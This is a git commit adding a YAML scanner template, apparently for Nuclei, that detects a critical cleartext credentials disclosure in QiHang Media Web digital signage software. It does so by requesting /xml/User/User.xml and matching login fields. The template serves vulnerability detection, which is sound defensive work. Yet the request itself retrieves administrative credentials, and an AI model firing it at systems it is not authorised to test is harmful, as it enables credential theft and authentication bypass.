Create qihang-media-web-credentials-disclosure.yaml

The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-10-01 15:42:48 +09:00 · 2021-10-01 15:42:48 +09:00 · f750bf5ba5
parent 90138f44d1
commit f750bf5ba5
1 changed files with 22 additions and 0 deletions
--- a/vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml
+++ b/vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml
@ -0,0 +1,22 @@
+id: qihang-media-web-credentials-disclosure
+
+info:
+  name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure
+  author: gy741
+  severity: critical
+  description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.
+  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php
+  tags: qihang,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/xml/User/User.xml"
+
+    matchers:
+      - type: word
+        words:
+          - "User id"
+          - "account"
+          - "password"
+        condition: and